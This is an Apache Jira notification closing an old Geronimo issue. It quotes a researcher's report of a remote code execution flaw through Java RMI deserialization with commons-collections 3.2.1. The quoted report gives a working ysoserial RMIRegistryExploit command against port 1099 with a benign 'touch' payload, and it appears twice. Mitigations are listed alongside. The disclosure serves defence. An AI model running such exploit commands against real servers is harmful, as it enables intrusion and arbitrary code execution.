[
https://issues.apache.org/jira/browse/GERONIMO-6596?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Mark Struberg closed GERONIMO-6596.
-----------------------------------
Resolution: Won't Fix
Closing old outdated issues.
Note that the Apache Geronimo Application Server itself was declared EOL in
2017 and we do not maintain the server parts anymore.
We still do actively maintain many of the Java EE / Jakarta EE which saw the
light during creation of the Apache Geronimo Aplication Server.
If you feel that this ticket still affects one of those components then please
feel free to reopen the ticket.
thanks, your Apache Geronimo team!
> Apache Geronimo Remote Code Execute Vulnerability
> -------------------------------------------------
>
> Key: GERONIMO-6596
> URL: https://issues.apache.org/jira/browse/GERONIMO-6596
> Project: Geronimo
> Issue Type: Bug
> Security Level: public(Regular issues)
> Components: dependencies, security
> Affects Versions: 3.0.1
> Environment: linux,windows
> Reporter: sevck
> Priority: Critical
> Labels: issue
>
> The unsupported Geronimo old versions may be also affected
> Description:
> The Apache Geronimo default enabled JAVA RMI 1099 port and default bind ip
> 0.0.0.0, in bash, I use "grep -R InvokerTransformer" command, find defalut
> use commons-collections-3.2.1.jar.
> [root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
> Binary file
> ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
> matches
> This looks like JAVA deserialization is taken for granted. But,I use
> ysoserial tools. CommonsCollections1 in response
> java.lang.ClassNotFoundException:
> org.apache.commons.collections.map.TransformedMap (no security manager: RMI
> class loader disabled),
> Seems to be classpath error, In java version 7u21 chanlog:
> -------------------------------------
> Changes to RMI
> From this release, the RMI property java.rmi.server.useCodebaseOnly is set to
> true by default. In previous releases the default value was false.
> This change of default value may cause RMI-based applications to break
> unexpectedly. The typical symptom is a stack trace that contains a
> java.rmi.UnmarshalException containing a nested
> java.lang.ClassNotFoundException.
> For more information, see RMI Enhancements.
> ---------------------------------------
> so,use 7u21 run application.
> attack server:
> java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar
> ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch
> /tmp/apache_geronimo"
> Mitigation:
> Commons-collections-3.2.1 users should upgrade to 3.2.2
> Ports are not allowed for public access
> Exploit:
> (precondition: server run jre version is 7u21)
> java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar
> ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch
> /tmp/apache_geronimo"
> Credit:
> This issue was discovered by QingTeng cloud Security of Minded Security
> Researcher jianan.huang
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
